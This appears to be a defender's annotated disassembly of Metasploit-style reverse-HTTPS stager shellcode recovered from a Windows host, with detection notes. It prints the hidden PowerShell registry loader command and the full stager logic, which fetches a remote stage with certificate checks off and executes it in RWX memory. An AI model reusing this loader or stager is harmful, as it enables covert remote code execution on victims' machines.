; Shellcode found on a Windows host. The payload was stored in the registry; PowerShell
; was used to extract it from the registry and execute it:
; C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle \
; hidden -c "$val = (gp HKLM:SOFTWARE\'').''; \
; $d = [System.Text.Encoding]::Unicode.GetString([System.convert]::FromBase64String($val)); iex $d"
; The following references were used to help comment the shellcode
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_https_proxy.asm
; https://hiddencodes.wordpress.com/2014/11/11/api-hash-list-4/
; ---------------------------------------------------------------------------
; api_call (entry 0x80006): resolve a Win32 export by hash and tail-call it.
; Calling convention used by every `push <hash> ; call ebp` below:
;   [esp]      = hash( module name, export name )  (pushed last by the caller)
;   above it   = the API's own arguments, pushed by the caller and left in place
;   result     = whatever the API returns; the API's own `ret` goes back to the caller
; Hash = ror-13/add over the upper-cased UTF-16 module name plus ror-13/add over
; the ASCII export name (the hash list referenced in the header gives the values).
; Detection note: the PEB walk below (fs:[0x30] -> Ldr -> InMemoryOrderModuleList)
; and the ror-13 loop are the metasploit block_api pattern referenced in the header.
; ---------------------------------------------------------------------------
0x00080000: cld cld ; DF = 0 so lodsb (0x80020, 0x80056) walks forward
0x00080001: call 0x8008f ; pushes 0x80006 (api_call); popped into ebp at 0x8008f
0x00080006: pushal pushal ; 60 ; save all registers; popal at 0x80082 restores them (the eax slot is overwritten with the result)
0x00080007: mov ebp, esp ; 89 e5 ; frame base: [ebp+0x24] = caller's hash, [ebp-8] = module-name hash pushed at 0x8002f
0x00080009: xor edx, edx ; 31 d2
0x0008000B: mov edx, dword ptr fs:[edx + 0x30] ; edx = PEB
0x0008000F: mov edx, dword ptr [edx + 0xc] ; edx = PEB->Ldr
0x00080012: mov edx, dword ptr [edx + 0x14] ; edx = Ldr->InMemoryOrderModuleList.Flink; the entry offsets below are relative to this link
; --- next_mod (0x80015): hash the current module's base name ---
0x00080015: mov esi, dword ptr [edx + 0x28] ; esi = BaseDllName.Buffer (UTF-16)
0x00080018: movzx ecx, word ptr [edx + 0x26] ; ecx = BaseDllName.MaximumLength in bytes = loop count
0x0008001C: xor edi, edi ; edi = running module-name hash
0x0008001E: xor eax, eax
0x00080020: lodsb al, byte ptr [esi] ; one byte of the UTF-16 name (the zero high bytes are hashed as well)
0x00080021: cmp al, 0x61 ; 'a'
0x00080023: jl 0x80027 ; below 'a': keep as is
0x00080025: sub al, 0x20 ; otherwise fold to upper case so the lookup is case-insensitive
0x00080027: ror edi, 0xd ; hash = ror(hash, 13) + byte
0x0008002A: add edi, eax
0x0008002C: loop 0x8001e ; repeat for every byte of the name
0x0008002E: push edx ; save the LDR entry (popped at 0x8008a)
0x0008002F: push edi ; save the module-name hash; read back as [ebp-8] at 0x80060
0x00080030: mov edx, dword ptr [edx + 0x10] ; edx = DllBase (image base of this module)
0x00080033: mov eax, dword ptr [edx + 0x3c] ; e_lfanew
0x00080036: add eax, edx ; eax = IMAGE_NT_HEADERS
0x00080038: mov eax, dword ptr [eax + 0x78] ; RVA of the export directory (DataDirectory[0])
0x0008003B: test eax, eax
0x0008003D: je 0x80089 ; no export table: move on to the next module
0x0008003F: add eax, edx ; eax = IMAGE_EXPORT_DIRECTORY
0x00080041: push eax ; saved for 0x80068 / 0x80088
0x00080042: mov ecx, dword ptr [eax + 0x18] ; NumberOfNames
0x00080045: mov ebx, dword ptr [eax + 0x20] ; AddressOfNames RVA
0x00080048: add ebx, edx ; ebx = AddressOfNames
; --- get_next_func (0x8004a): walk the export name table backwards ---
0x0008004A: jecxz 0x80088 ; every name checked: the export is not in this module
0x0008004C: dec ecx ; ecx = index of the name under test
0x0008004D: mov esi, dword ptr [ebx + ecx*4] ; name RVA
0x00080050: add esi, edx ; esi = export name (ASCII, NUL-terminated)
0x00080052: xor edi, edi ; edi = running export-name hash
0x00080054: xor eax, eax ; eax = 0, so ah == 0 serves as the NUL test below
0x00080056: lodsb al, byte ptr [esi]
0x00080057: ror edi, 0xd ; hash = ror(hash, 13) + byte (the terminating NUL is folded in too)
0x0008005A: add edi, eax
0x0008005C: cmp al, ah ; reached the NUL terminator?
0x0008005E: jne 0x80054
0x00080060: add edi, dword ptr [ebp - 8] ; edi = export-name hash + module-name hash
0x00080063: cmp edi, dword ptr [ebp + 0x24] ; equal to the hash the caller pushed?
0x00080066: jne 0x8004a ; no: next name
; --- match found: turn the name index into a function address ---
0x00080068: pop eax ; eax = IMAGE_EXPORT_DIRECTORY
0x00080069: mov ebx, dword ptr [eax + 0x24] ; AddressOfNameOrdinals RVA
0x0008006C: add ebx, edx
0x0008006E: mov cx, word ptr [ebx + ecx*2] ; cx = ordinal of the matched name (only the low 16 bits of ecx are written)
0x00080072: mov ebx, dword ptr [eax + 0x1c] ; AddressOfFunctions RVA
0x00080075: add ebx, edx
0x00080077: mov eax, dword ptr [ebx + ecx*4] ; function RVA
0x0008007A: add eax, edx ; eax = function VA
0x0008007C: mov dword ptr [esp + 0x24], eax ; overwrite the eax slot of the pushal frame so popal returns the address in eax
0x00080080: pop ebx ; 5b ; drop the module-name hash
0x00080081: pop ebx ; 5b ; drop the LDR entry
0x00080082: popal popal ; 61 ; restore the caller's registers, eax = resolved API
0x00080083: pop ecx ; 59 ; ecx = caller's return address
0x00080084: pop edx ; 5a ; drop the hash argument
0x00080085: push ecx ; 51 ; put the return address back on top of the API's arguments
0x00080086: jmp eax ; ff e0 ; tail-call the API; its ret lands in the caller
; --- not found in this module (0x80088) ---
0x00080088: pop eax ; 58 ; drop IMAGE_EXPORT_DIRECTORY
0x00080089: pop edi ; drop the module-name hash
0x0008008A: pop edx ; edx = LDR entry
0x0008008B: mov edx, dword ptr [edx] ; follow Flink to the next module
0x0008008D: jmp 0x80015 ; next_mod; no end-of-list check is made, an unresolvable hash keeps walking the list
0x0008008F: pop ebp ; ebp = 0x80006 = api_call; every `call ebp` below goes through the resolver above
; load wininet -- LoadLibraryA("wininet") then InternetOpenA(user agent, ...)
0x00080090: push 0x74656e ; Push the bytes 'wininet',0 onto the stack. (0x74656e = "net",0)
0x00080095: push 0x696e6977 ; ... (0x696e6977 = "wini")
0x0008009A: push esp ; Push a pointer to the "wininet" string on the stack.
0x0008009B: push 0x726774c ; hash( "kernel32.dll", "LoadLibraryA" )
0x000800A0: call ebp ; LoadLibraryA( "wininet" )
0x000800A2: call 0x80127 ; pushes 0x800a7 = address of the user-agent bytes that follow; the callee pops it
; user agent string - Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; ASU2JS)
; NOTE(review): 0x800a7-0x8012b (the UA bytes, the pop of the UA pointer and the first two
; InternetOpenA pushes, dwFlags and lpszProxyBypass) are not in this listing; presumably
; ecx = UA pointer and edi = 0 on entry to 0x8012c -- confirm against the raw bytes.
; INTERNETAPI_(HINTERNET) InternetOpenA(
; LPCSTR lpszAgent,
; DWORD dwAccessType,
; LPCSTR lpszProxy,
; LPCSTR lpszProxyBypass,
; DWORD dwFlags);
0x0008012C: push edi ; lpszProxy (NULL if edi = 0 as assumed above)
0x0008012D: push edi ; dwAccessType
0x0008012E: push ecx ; lpszAgent
0x0008012F: push 0xa779563a ; hash( "wininet.dll", "InternetOpenA" )
0x00080134: call ebp ; eax = hInternet
0x00080136: jmp 0x801ce ; -> jmp 0x80219 -> call 0x8013b, which pushes the hostname address and lands in the InternetConnectA setup
; InternetConnectA( hInternet, hostname, 443, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0 )
; Reached via `call 0x8013b` at 0x80219, so [esp] = 0x8021e = the hostname bytes at the end of the listing.
; void InternetConnectA(
; HINTERNET hInternet,
; LPCSTR lpszServerName,
; INTERNET_PORT nServerPort,
; LPCSTR lpszUserName,
; LPCSTR lpszPassword,
; DWORD dwService,
; DWORD dwFlags,
; DWORD_PTR dwContext);
0x0008013B: pop ebx ; pop URL (hostname), store in ebx ; ebx = 0x8021e (address pushed by the call at 0x80219)
0x0008013C: xor ecx, ecx ; NULL
0x0008013E: push ecx ; DWORD_PTR dwContext (NULL)
0x0008013F: push ecx ; dwFlags (NULL)
0x00080140: push 3 ; DWORD dwService (INTERNET_SERVICE_HTTP)
0x00080142: push ecx ; password (NULL)
0x00080143: push ecx ; username (NULL)
0x00080144: push 0x1bb ; port 443 (INTERNET_DEFAULT_HTTPS_PORT) -- outbound TLS to the hostname is the first network indicator
0x00080149: push ebx ; hostname
0x0008014A: push eax ; HINTERNET hInternet (returned by InternetOpenA at 0x80134)
0x0008014B: push 0xc69f8957 ; hash( "wininet.dll", "InternetConnectA" )
0x00080150: call ebp
0x00080152: mov ebx, eax ; ebx = hConnect (InternetConnectA result); reused by the retry path at 0x801c6
0x00080154: jmp 0x801d0 ; -> call 0x80156, which pushes the address of the URI bytes (0x801d5) and lands in the HttpOpenRequestA setup
; HttpOpenRequestA( hConnect, NULL (= GET), uri, NULL, NULL, NULL, dwFlags, 0 )
; Entered via `call 0x80156` at 0x801d0, so [esp] = 0x801d5 = the URI bytes (mis-decoded as instructions further down).
; INTERNETAPI_(HINTERNET) HttpOpenRequestA(
; HINTERNET hConnect,
; LPCSTR lpszVerb,
; LPCSTR lpszObjectName,
; LPCSTR lpszVersion,
; LPCSTR lpszReferrer,
; LPCSTR *lplpszAcceptTypes,
; DWORD dwFlags,
; DWORD_PTR dwContext);
0x00080156: pop ecx ; ecx = address of the NUL-terminated URI path (0x801d5)
0x00080157: xor edx, edx ; NULL
0x00080159: push edx ; dwContext (NULL)
0x0008015A: push 0x84a03200 ; ( 0x80000000 | 0x04000000 | 0x00800000 | 0x00200000 |0x00001000 |0x00002000 |0x00000200) ; dwFlags
; 0x80000000 | ; INTERNET_FLAG_RELOAD
; 0x04000000 | ; INTERNET_FLAG_NO_CACHE_WRITE
; 0x00800000 | ; INTERNET_FLAG_SECURE (TLS)
; 0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
; 0x00001000 | ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID
; 0x00002000 | ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
; 0x00000200 ; INTERNET_FLAG_NO_UI
; Note: the two IGNORE_CERT_* flags already relax certificate checking; InternetSetOptionA below disables it further.
0x0008015F: push edx ; accept types (NULL)
0x00080160: push edx ; referrer (NULL)
0x00080161: push edx ; version (NULL)
0x00080162: push ecx ; url (object name / URI path)
0x00080163: push edx ; method (NULL -> WinINet defaults to GET)
0x00080164: push eax ; hConnection (hConnect; eax is also restored to ebx on the retry path at 0x801c6)
0x00080165: push 0x3b2e55eb ; hash( "wininet.dll", "HttpOpenRequestA" )
0x0008016A: call ebp
0x0008016C: mov esi, eax ; hHttpRequest (esi stays the request handle for the rest of the payload)
; InternetSetOptionA( hRequest, INTERNET_OPTION_SECURITY_FLAGS, &0x3380, 4 )
; Effect: the server certificate is never validated (unknown CA, wrong CN, expired,
; wrong usage, revocation all ignored). The transport therefore provides no server
; authentication; a self-signed listener works, and so does a TLS-inspecting proxy.
; BOOLAPI InternetSetOptionA(
; HINTERNET hInternet,
; DWORD dwOption,
; LPVOID lpBuffer,
; DWORD dwBufferLength);
0x0008016E: push 0x3380 ; 0x00002000 | ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
; 0x00001000 | ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID
; 0x00000200 | ; SECURITY_FLAG_IGNORE_WRONG_USAGE
; 0x00000100 | ; SECURITY_FLAG_IGNORE_UNKNOWN_CA
; 0x00000080 ; SECURITY_FLAG_IGNORE_REVOCATION
0x00080173: mov eax, esp ; eax = &dwFlags (the DWORD just pushed; it is never popped and simply stays on the stack)
0x00080175: push 4 ; sizeof(dwFlags)
0x00080177: push eax ; &dwFlags
0x00080178: push 0x1f ; DWORD dwOption (31 = INTERNET_OPTION_SECURITY_FLAGS)
0x0008017A: push esi ; hRequest
0x0008017B: push 0x869e4675 ; hash( "wininet.dll", "InternetSetOptionA" )
0x00080180: call ebp ; return value is not checked
; HttpSendRequestA( hRequest, NULL, 0, NULL, 0 ), then the proxy/auth retry logic of
; block_reverse_https_proxy.asm (referenced in the header): InternetErrorDlg inspects
; the response and asks for a resend with ERROR_INTERNET_FORCE_RETRY when needed.
; BOOLAPI HttpSendRequestA(
; HINTERNET hRequest,
; LPCSTR lpszHeaders,
; DWORD dwHeadersLength,
; LPVOID lpOptional,
; DWORD dwOptionalLength);
0x00080182: xor edi, edi ; NULL
0x00080184: push edi ; optional length
0x00080185: push edi ; optional
0x00080186: push edi ; dwHeadersLength
0x00080187: push edi ; headers
0x00080188: push esi ; hHttpRequest
0x00080189: push 0x7b18062d ; hash( "wininet.dll", "HttpSendRequestA" )
0x0008018E: call ebp ; the HTTPS GET for the URI goes out here
0x00080190: test eax, eax ; test for failure (FALSE = send failed)
0x00080192: je 0x801dc ; -> failure path: a push imm32 / call ebp hidden inside the mis-decoded bytes at 0x801db-0x801e2
; --- request sent: decide whether to retry (proxy/auth) or download the stage ---
0x00080194: xor edi, edi
0x00080196: test esi, esi ; hRequest NULL?
0x00080198: je 0x8019e
0x0008019A: mov ecx, edi ; valid handle: dwError = 0, let the dialog examine the response
0x0008019C: jmp 0x801a7
0x0008019E: push 0x5de2c5aa ; hash( "kernel32.dll", "GetLastError" )
0x000801A3: call ebp
0x000801A5: mov ecx, eax ; dwError = GetLastError()
0x000801A7: push 0x315e2145 ; GetDesktopWindow (user32.dll)
0x000801AC: call ebp ; eax = desktop HWND, used as the dialog parent
0x000801AE: xor edi, edi
0x000801B0: push edi ; LPVOID *lppvData (NULL)
0x000801B1: push 7 ; dwFlags; presumably FLAGS_ERROR_UI_FILTER_FOR_ERRORS | FLAGS_ERROR_UI_FLAGS_CHANGE_OPTIONS | FLAGS_ERROR_UI_FLAGS_GENERATE_DATA
0x000801B3: push ecx ; dwError
0x000801B4: push esi ; hRequest
0x000801B5: push eax ; hWnd
0x000801B6: push 0xbe057b7 ; InternetErrorDlg (wininet.dll)
0x000801BB: call ebp
0x000801BD: mov edi, 0x2f00 ; ERROR_INTERNET_FORCE_RETRY (12032)
0x000801C2: cmp edi, eax
0x000801C4: jne 0x801ca ; any other result: go download the stage
0x000801C6: mov eax, ebx ; retry: eax = hConnect saved at 0x80152
0x000801C8: jmp 0x80154 ; -> re-open and resend the request; no retry counter is visible here
0x000801CA: xor edi, edi ; edi = 0 (NULL lpAddress for VirtualAlloc)
0x000801CC: jmp 0x801e3 ; -> stage allocation
; --- trampolines, the URI string and the failure exit (mis-decoded by the disassembler) ---
0x000801CE: jmp 0x80219 ; hop from 0x80136 -> call 0x8013b (pushes the hostname address)
0x000801D0: call 0x80156 ; pushes 0x801d5 = address of the URI bytes below; 0x80156 pops it into ecx
; 0x801d5-0x801da are data, not code: reading the opcode bytes back (2f 53 66 6f 34 00)
; gives the NUL-terminated ASCII URI path "/Sfo4" that HttpOpenRequestA receives.
0x000801D5: das das ; 2f = '/'
0x000801D6: push ebx ; 53 = 'S'
0x000801D7: outsw dx, word ptr [esi] ; 66 6f = 'f','o'
0x000801D9: xor al, 0 ; 34 00 = '4', NUL terminator
0x000801DB: add byte ptr [eax - 0x10], ch ; 00 68 f0: a zero byte, then 0x801dc -- the je target from 0x80192 and 0x8020d -- begins a 5-byte push imm32 (68 f0 b5 a2 56)
0x000801DE: mov ch, 0xa2 ; b5 a2: bytes 3-4 of that immediate
0x000801E0: push esi ; 56: last byte of that immediate (not a real push)
0x000801E1: call ebp ; failure path: resolve-and-call the hash pushed at 0x801dc, presumably the template's ExitProcess; confirm against the raw bytes
; --- stage download: VirtualAlloc(RWX) then InternetReadFile loop, then jump into the buffer ---
; Detection note: a private RWX region that is written by WinINet and then executed via `ret`
; is the classic staged-download pattern; memory scans for RWX private pages and unbacked
; executable memory catch it regardless of hostname or URI.
0x000801E3: push 0x40 ; PAGE_EXECUTE_READWRITE
0x000801E5: push 0x1000 ; MEM_COMMIT
0x000801EA: push 0x400000 ; Stage allocation: 0x400000 = 4 MiB (the metasploit source comment says "8Mb")
0x000801EF: push edi ; NULL (lpAddress; edi = 0 from 0x801ae / 0x801ca)
0x000801F0: push 0xe553a458 ; hash( "kernel32.dll", "VirtualAlloc" )
0x000801F5: call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
0x000801F7: xchg eax, ebx ; ebx = stage buffer (write cursor); eax = old hConnect, unused from here on
0x000801F8: push ebx ; stage start address, consumed by the final ret at 0x80218
0x000801F9: push ebx ; scratch DWORD used as bytesRead (initial value irrelevant)
0x000801FA: mov edi, esp ; edi = &bytesRead
; --- read_more (0x801fc) ---
0x000801FC: push edi ; &bytesRead
0x000801FD: push 0x2000 ; read length (8 KiB per call)
0x00080202: push ebx ; buffer (current write cursor)
0x00080203: push esi ; hRequest
0x00080204: push 0xe2899612 ; hash( "wininet.dll", "InternetReadFile" )
0x00080209: call ebp
0x0008020B: test eax, eax ; FALSE = read error
0x0008020D: je 0x801dc ; -> failure path (push/call ebp hidden in the bytes at 0x801dc-0x801e2)
0x0008020F: mov eax, dword ptr [edi] ; eax = bytesRead
0x00080211: add ebx, eax ; buffer += bytes_received
0x00080213: test eax, eax ; 0 bytes = end of the response body
0x00080215: jne 0x801fc ; else keep reading; nothing bounds the cursor against the 0x400000 allocation
0x00080217: pop eax ; clear the temporary storage (the bytesRead slot)
0x00080218: ret ret ; pops the stage start address pushed at 0x801f8 and jumps into the downloaded stage
0x00080219: call 0x8013b ; InternetConnectA setup; pushes 0x8021e = address of the hostname bytes, which 0x8013b pops into ebx
url:
; 0x0008021E: 61 ; first byte of the NUL-terminated hostname (0x61 = 'a'); the remaining bytes are not reproduced
; url foobar.com (placeholder for the actual hostname)
Source: https://gist.github.com/jdferrell3/4db966da06f4fa77816a54d802aca0f8